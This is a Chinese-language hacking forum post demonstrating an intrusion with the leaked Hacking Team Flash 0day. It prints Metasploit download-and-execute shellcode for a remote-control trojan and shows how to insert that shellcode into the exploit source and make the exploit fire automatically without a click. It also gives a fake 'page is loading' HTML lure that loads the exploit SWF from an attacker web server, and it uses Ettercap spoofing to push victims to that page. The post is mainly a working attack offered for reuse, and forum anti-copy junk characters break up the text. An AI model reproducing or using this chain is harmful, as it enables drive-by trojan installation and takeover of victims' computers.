找回密码
 立即注册
查看: 2020|回复: 0
打印 上一主题 下一主题

flash 0day之手工代码修改制作下载者实例入侵演示

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:28:55 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

0 F3 `& N6 J; ]4 D9 t 三、flash 0day之手工代码修改制作下载者实例入侵演示 7 U& r1 R: `0 r! L) }

( |. ?) g+ k3 E3 e0 l

; l6 B) _7 M* q1 k( f 利用到的工具: " E( `5 m$ K5 W; T. S

5 K/ d4 H e( F+ T5 W1 h+ w

* d" @2 ^ Q8 d Msf . z/ F" a# r7 K

0 |( y" y/ b& A4 q

" e: R! F, w1 e0 b Ettercap o! A' j% `1 R# y2 S) S

# n9 P4 X7 R( Y; l5 B7 E! g

6 J) z. \' F; T: d Adobe Flash CS6 . V) O% i: |* u$ H$ C

% T& w0 k% z: r* T* Z4 v& e

& i% r( U9 c! a( j" O; ?" D Hacking Team Flash 0day-可冲破Chrome沙盒-Evil0X源代码一份 # z4 ?7 v+ j- W) }' i" q% Q; @* O* f

; s6 O2 k$ o: w

; c9 `4 D* ~5 d 下面我们就开始演示入侵,利用msf生成shellcode,首先打开msf执行use windows/download_execshow options / E D7 t f% O( o; w" d

H. n3 p7 a, b; G

1 K, i. Z2 \; j! R3 ^' }$ p 如图: ; W7 K' M7 g, J

1 j2 G0 s/ c* a: @# l5 ^+ e5 d

& M* u$ x5 l( C5 r7 i# h+ O   ) B+ M0 `9 F/ m# ]- t1 Q

5 u' b9 W: K7 | o

1 v" K) W" Y |. t; F   f$ Q1 J1 k6 O$ V

3 F7 Q/ D8 ?( Y4 r. g4 E9 A: A

6 J- L$ q4 T) R0 z/ A- n 然后set EXE system.exe,再执行set URL,需要说明一下URL就是我们的马的下载地址,这里我们用远控马,远控配置使用不再详细说明。。。如图: / @; b1 x% v, E5 a; x: l

( Y3 Y: [! i$ k+ z8 v8 {/ U

^4 P4 X9 ^5 y, X5 e" C( y3 C   7 o' C6 n4 ^& T. d3 S: R

0 [1 U- m5 l1 \3 @3 {4 t$ T

/ g. s8 |5 `* O: [( z M   , @& P* T. z, C! W; f/ u& p

" W' E" j9 L1 t- y" b# w

$ E* y3 J7 E D3 x 然后执行generate -t dword生成shellcode,如下: 3 Z& w ~0 h: H+ b& @

8 R0 W) C3 G1 P7 l. a r, O

# y& f) Q9 z& a( y+ c$ K9 U! a   0 J7 S b& ~* I. t6 Q

9 m( f: R, i4 n% V7 B* ] h1 e# n

+ W: P" @" ], k/ u' C 复制代码到文本下便于我们一会编辑flash exp,如下: ) G" J8 L: W6 T8 d/ T

( D& g, P7 w% A( v

. c$ o2 M \1 ~1 } 0x0089e8fc, 0x89600000, 0x64d231e5, 0x8b30528b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0xc031ff31, 6 V- {3 z& [( k* k1 z0 D8 d

" {5 I, D4 `5 [2 z+ ?* S/ C' A) j

5 ^' l9 U7 `2 [# g' O' ^ 0x7c613cac, 0xc1202c02, 0xc7010dcf, 0x5752f0e2, 0x8b10528b, 0xd0013c42, 0x8578408b, 0x014a74c0, ! _1 s0 W6 U3 f8 n9 s+ ?

" m* _, t; k( ?

. I. x8 ]# D, l9 }6 a4 c 0x488b50d0, 0x20588b18, 0x3ce3d301, 0x8b348b49, 0xff31d601, 0xc1acc031, 0xc7010dcf, 0xf475e038, ! G; m; a& S/ s/ m! \

2 Q! t; f3 z- b

# _+ ~; y; O1 Y9 j X 0x3bf87d03, 0xe275247d, 0x24588b58, 0x8b66d301, 0x588b4b0c, 0x8bd3011c, 0xd0018b04, 0x24244489, 2 b/ `" C/ ?; A( d5 t. o4 w2 q" v* N

: p& j8 h9 c$ M5 [, d1 X2 \7 g

3 ]' H6 M3 p y. P1 a( D/ ] 0x59615b5b, 0xe0ff515a, 0x8b5a5f58, 0x5d86eb12, 0x74656e68, 0x69776800, 0xe689696e, 0x774c6854, % f$ d' G g0 p1 o1 S9 P0 L7 p

! u: A" ~& Y ~, d. P- u& z

0 m- Z0 D' A% l 0xd5ff0726, 0x5757ff31, 0x68565757, 0xa779563a, 0x60ebd5ff, 0x51c9315b, 0x51036a51, 0x53506a51, 3 h, O+ j* k8 O" K

6 T d ?) Z5 \: m5 X* u( ?

, j0 w& L$ k+ g* t 0x89576850, 0xd5ffc69f, 0x31594feb, 0x006852d2, 0x52846032, 0x52515252, 0x55eb6850, 0xd5ff3b2e, 9 h! }3 U, l: d+ z+ A: b

; p& o& R( u; _) S% @) s

* u% A+ |! t- S$ l( D* J 0x106ac689, 0x3380685b, 0xe0890000, 0x6a50046a, 0x7568561f, 0xff869e46, 0x57ff31d5, 0x56575757, 2 f6 M$ _4 b, c: K( l3 C3 e

% u Z i' v9 G. J/ q$ u

; U# O- p" @3 X: k 0x18062d68, 0x85d5ff7b, 0x4b1f75c0, 0x007c840f, 0xd1eb0000, 0x00008ee9, 0xfface800, 0x732fffff, 7 q% A7 u1 K3 j# m

8 K" p- M+ R" Q+ {8 h$ \; L p

1 `. s6 ?' s j2 m" O3 x9 t 0x65747379, 0x78652e6d, 0x6beb0065, 0x505fc031, 0x026a026a, 0x6a026a50, 0xda685702, 0xff4fdaf6, 5 h! ]! B) E. f7 f) x; H

2 c7 L: v& H9 Y8 w2 r/ a9 E0 j* ^: a% f

; p( c! ^6 q! A 0xc03193d5, 0x0304b866, 0x8d54c429, 0x3108244c, 0x5003b4c0, 0x12685651, 0xffe28996, 0x74c085d5, & U. `2 [7 W* C- p" x

' W: z7 C; Q" Y* @& N

+ R8 f, ?. x" P3 y 0xc085582d, 0x006a1674, 0x448d5054, 0x53500c24, 0xae572d68, 0x83d5ff5b, 0xceeb04ec, 0x96c66853, 4 z7 h% l3 v) A9 u5 k# p

9 k* s- _! W# ]6 i3 r; M q4 Y k

6 C m4 i* K5 X" E$ q 0xd5ff5287, 0x6857006a, 0x876f8b31, 0x006ad5ff, 0xa2b5f068, 0xe8d5ff56, 0xffffff90, 0x74737973, # ]: r5 d. @" y i7 [6 C

2 B) ]. d& o2 Z1 u) g

, @6 k1 K7 t2 L 0x652e6d65, 0xe8006578, 0xffffff08, 0x2e737378, 0x64696162, 0x6b682e6f, 0x00000000 B& v6 Q4 j" l$ A" T

$ N0 c6 j! V- K7 H: i

; E0 A/ q; S7 O+ l   & [4 L% v7 @6 N: J: _% E0 Q

/ ]( r1 n$ v5 c" K

2 e6 Z5 m4 ?; B4 d5 |0 C   % q4 }6 B n* F1 F, T$ X5 O |

# k8 @. {. U3 ?. t% J- H! {

* [5 X- _5 t! O/ g' C0 e6 i 下面我们来修改flash 0day exp,需要修改三个文件,分别为: 0 r/ H ?! u! m

& t: l6 ~2 M$ e

- K9 P* v5 v+ K. `   + M& J. A4 s0 P0 G- z. g7 e

2 h$ }1 B/ U. j3 ~9 ?2 D8 X4 a

g6 i5 H- l' U" i( M1 Z! V 先修改ShellWin32.as,部分源代码如图: : ]! e) ~: D9 z- t+ R

" g1 E% d& y& b

* S4 i" _! P4 _   2 q) ], C% r) j [( Q

/ x$ n5 h( } Q! }1 `

6 W H j ]. L 我们需要把标记处[]中的代码改成用msf生成的代码,修改后如下: 9 p' m; [0 h y2 H q

$ e4 w9 c' c0 p: T9 y; G

$ y# ~+ [- D( L1 d2 v6 M* Y3 U   : G9 P/ ?3 J5 L" Q; o$ X

: i- N! j8 G8 ?+ p# y9 c9 n4 d

- _8 N9 k7 s. f$ l* H 然后保存,ShellWin64.as的修改方法如上述,不再演示,下面我们来修改myclass.as,这里需要说明一下,因为此exp生成的利用程序,不能直接自动触发flash漏洞,也就是需要点击按钮才可以,实际上在做渗透的时候需要把它搞得更完美,所以就需要修改,修改方法:搜索myclass的某个字符doc.addchild(btn);如图: : x8 h$ P3 I4 ]* i* U

0 @% [* C9 e6 C2 T6 B6 i& ]8 {

# {& L% U4 g$ B2 P4 m+ S# m   " N6 M8 T0 }. v3 k9 e( O9 M

3 j! q J/ G- D3 [

4 k7 O4 I" E" ]7 O( @# u, w 换行在后面加一句TryExpl();注意是l不是数字1,然后如图: " q* I- A P0 b& g

4 L( l* X7 l: E; P, O

r& r$ @% m1 ^ H, b& d4 ?! T3 V   " I, a: f* e. ~- a }- l

' b' w9 V9 ?2 y, D* Y# ]- _

# x: c {( t; l- G9 F! J, o3 O2 b6 p   $ ]9 E/ p0 K9 I3 c8 |3 Q( C

6 b5 M: ]( R/ n3 G a+ Z

$ B9 W$ y& I: x1 T" x3 z: \) t9 Z, k   - T* x i; Y2 @

( K: x2 S+ R7 e0 l

( f0 M9 A. R0 u# t3 H 然后点保存,下面我们来编译一下,打开 5 `9 `; D8 J- E: F8 l

5 E/ n+ m$ h8 o/ O4 y$ D+ a3 J! Z

7 Y" s Q4 f, C exp1.fla然后点文件-发布,看看编译没错误 N6 q& r3 z- k% S; h6 n; w

9 L z8 y9 n- R1 R& B: v" ]# r

8 p; G3 P/ N" ]/ D, [" I5 P2 D- _) K   : M1 i- w E6 Y' Z

4 ^: w4 @9 @# N' ?9 N

" ]6 `; @* J6 V   & r; `, }% T8 x

( U% h! k) M! @2 z$ k: g- }

% b* Q$ X& P' c7 i- S   ! o" w4 i3 F- }" g7 r

5 T! Y& F( [( E e! A: S4 F& O

! Z& z, a. [" p8 H) M4 u   . L8 @% N/ M7 P. u4 m

. j, P6 u- S7 u0 o4 ]6 Y0 p9 z9 o- ^

" L+ _# u: ~3 J5 b% M( ]: y$ C 然后我们把生成的 5 d* r& W \: K: X

1 W9 S% T: L' i

0 ?# v; D/ L6 o$ T, Y exp1.swf丢到kailinux /var/www/html下: 1 p9 Q3 c; w/ e4 b; L4 \5 X) o7 c

2 L7 \" z2 ~6 k

" o! {5 k: z, | d4 J* `2 ~ 然后把这段代码好好编辑一下 7 ^6 Q+ k0 r5 p# l# P9 _

: H, t( v/ X8 |( K

1 P4 F* P; W4 }9 @/ a6 _   ; T! [& ]' i* g5 v" R

6 c3 H+ h7 p0 t# j8 H

4 o( k6 B e- m/ I   # g; g! p& \5 D3 f" E

2 z2 o- }. J" P$ `

: M) [8 c( U+ C! d   + N8 h7 e1 ^- a8 v, W. M. o

6 L% p3 m" p, h; Q5 F* N. ? d5 W

" J5 Y. Q5 B" Q* X( A) A   % K I6 y3 U1 `/ O

" f5 y7 I( n9 [+ a& d

9 Z! u% `6 _# @- h9 g7 N5 v8 |   1 c U0 ?( t4 G- O5 z

4 L7 k2 a1 k1 a4 g

( }& j) S+ C" }   ; q$ r" |2 ^- g0 b; N: v' Q8 e6 D

# f8 h6 |$ D c" x6 T+ s5 o

* {+ p4 W5 B4 R0 z: f: V% F <!DOCTYPE html> 0 S, P( {( M0 V

5 v n9 c1 d' ~3 V) _" v) P! D& n: J

) d; P: ^. s& M$ X6 Q n# O <html> 1 O7 \, G0 V0 F' V9 w" e$ y5 n! ?

1 T# T0 Z/ ~3 [% l8 Z2 j( S: ^

$ W# Y, b* J+ x5 r <head> 3 G8 d0 U8 h$ R

j- N% F% a% h( @

5 V! _2 h, t: {8 w, z: M8 R( ` <meta http-equiv="Content-Type" content="text/html; ' F1 o6 p7 Z0 f

* W6 G" g! p5 \, w4 X/ I% }

" ]& @+ o2 ^% N( s) }7 v charset=utf-8"/> , a/ d6 m' U5 ]* V' W- k; g! v2 ^

& A; c. {6 \! Q& C

2 o8 N* @. K( ` </head> 0 x' |! Z, R8 B7 E/ A4 }

6 P; E1 C5 W7 d0 s Q

' b7 J; U8 e! @! v3 x <body> 0 G0 K" y# B( U* r

9 |8 m2 F. @$ M

/ j8 j. e" T/ O. l$ ~ <h2> Please wait, the requested page is loading...</h2> 1 L( @9 W, B+ M7 S9 J; m8 j' ~5 V- w

6 n9 u7 U% j+ H0 X! P3 w5 I: |

: s& ~9 |6 {! q' t# [ <br> * s' A+ O4 Y: f" y6 } M6 m/ T

; E: V' `' }, v" t) s4 T

; R0 D- F O! h6 W9 I+ e, W <OBJECT ( J5 h& J$ t6 r0 S8 j

4 t1 E" V5 J3 s& e G4 J! G

: _# ]5 `! j X7 T5 @6 |1 y classid="clsid27CDB6E-AE6D-11cf-96B8-444553540000"  WIDTH="50" HEIGHT="50" id="4"><ARAM NAME=movie 1 ^. k) F1 z; r/ g+ u

$ y" g+ i: X7 m1 R# P

) ^' s, k' |. k. ?7 Z, i5 H VALUE="http://192.168.0.109/exp1.swf"></OBJECT> 4 ~' ?9 m; j; A) R& t) o( v* P

( `8 ~9 U- J" A6 k4 a

2 |0 m! P& {) C$ c8 A0 G. }8 m </body> 8 B! Q* Z/ Z( P

, Y8 d D/ ]" ]$ ?# C- g

# n1 [( O$ j0 ]+ ^! N4 m/ u3 | <script> $ _; n: C1 m# V! z7 x

0 N% t& B+ O9 h T6 Y* ^

4 e7 Z+ w- a7 G2 }. K: b     setTimeout(function () { " N5 r+ x( d4 o; k8 K5 ^! s

; v# F+ S* h3 N

! N4 W- l" I/ N6 Q6 }4 [& O9 _& v          5 T; o) ~% j5 Y, g

: s% U2 P" y l. S

% I2 Z( s0 }/ `- L2 }; G3 o: t( M. M9 `/ K window.location.reload(); . A$ R8 W5 F. z* e3 r6 b8 Z

* s6 X f- L1 `: Y

+ i. w- \1 W! H) ]9 M. e* S( P     }, 10000); , U2 s( M, a/ L! y1 s+ |

: _& c" H( m8 K* v' i

0 ?- U& o- H$ }4 v! w   . ~, V2 y7 D& b+ ], Y

2 ~ _% P, f+ x0 g! q

! r$ i7 f+ {! F9 A </script> % T& }9 ^7 E F& t6 m' I: w

, g) j* m* v/ F# [! P N( a

) _3 Q9 x1 H' e9 F1 O </html> 6 t; r+ y, l) ]3 d9 S# D) z) P

; `0 l6 p/ w0 ?6 p6 H. Y2 ?2 e

$ O' W+ R6 w$ G/ D: ?   0 u0 j" P+ g/ H3 j0 T

0 }+ N; A1 {: o. O6 t

4 J: [! f* o9 @; s2 @! o" g: G 注意:192.168.0.109kaliip地址,这时候我们需要service apache2 start启动一下web服务,然后将上面的html保存为index.htm同样丢到kali web目录下,测试访问链接存在如图: ! z" b' @0 n; w

5 p( G1 [$ F: o) W, ]5 q2 f5 |

1 a# E& q$ m0 @9 t( T   , E5 f0 \. N$ m8 x

/ U% W# u- ~* x

/ w" P3 }+ ^) f   * [( j, h) K8 I# B; r7 ]" W

7 T8 U* n6 S9 v* ~7 R

4 P: n) I8 u5 W3 H. s   $ l9 ^5 Q# @- I

) `7 w# z2 v6 O% X2 I5 g) \# I2 O

# O1 l2 V% L# }6 L0 X; {   : n7 b/ M4 ^) k7 Q8 k1 R

% U5 q4 Z/ Q1 m: |7 l" ~9 s$ i

9 v! G% G3 a, N! u, |   3 I+ O$ J' E, Y+ t

3 k4 ~! w. [) w* v2 U- i/ D( h: ]

$ z" s @7 ]' b# W 下面我们用ettercap欺骗如图: . Q: B. j' X8 V1 m* Q; [9 _' s: p; I

2 Q! z8 X8 j* [" t$ p

( Q$ h/ G% p3 s$ `* ^   7 d2 h8 y/ e7 @% M

( |5 r+ b& i# A: z

# l+ X J8 j9 R! Q5 m& B1 N5 Y   ) q: ?! J/ C9 r

0 o! a% n' U0 T( B" a

; w* A! n$ I/ q6 c+ q 下面我们随便访问个网站看看: % A! v) D) W6 L' F9 O

4 r1 g0 e; w2 ~5 h! i' v/ l& W

/ N0 ]4 |3 F, y 我靠我发现直接用ettercap欺骗物理机装了腾讯管家照样可以欺骗成功,如图: 7 \+ Z( q0 g4 d6 K( |/ w- S

- |! N! u' ~1 j. H: R3 y

. {7 M# K& _, H) Y+ k L0 K   ; u, m0 I4 h! m$ m0 g6 f4 ~

6 I& w9 \% A* T- O9 c

1 X+ s$ H# B% _5 U; | 我们看另一台, . w3 b3 @5 A- W2 w0 M7 W& Q

( q% I _! ]/ K( N# D5 a( x4 g

$ _9 u! l' r( A1 r! `0 B 提示这个错误,说明木马是成功被下载执行了,只是由于某些原因没上线而已。。。 ) d; k: c; |3 J# n

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表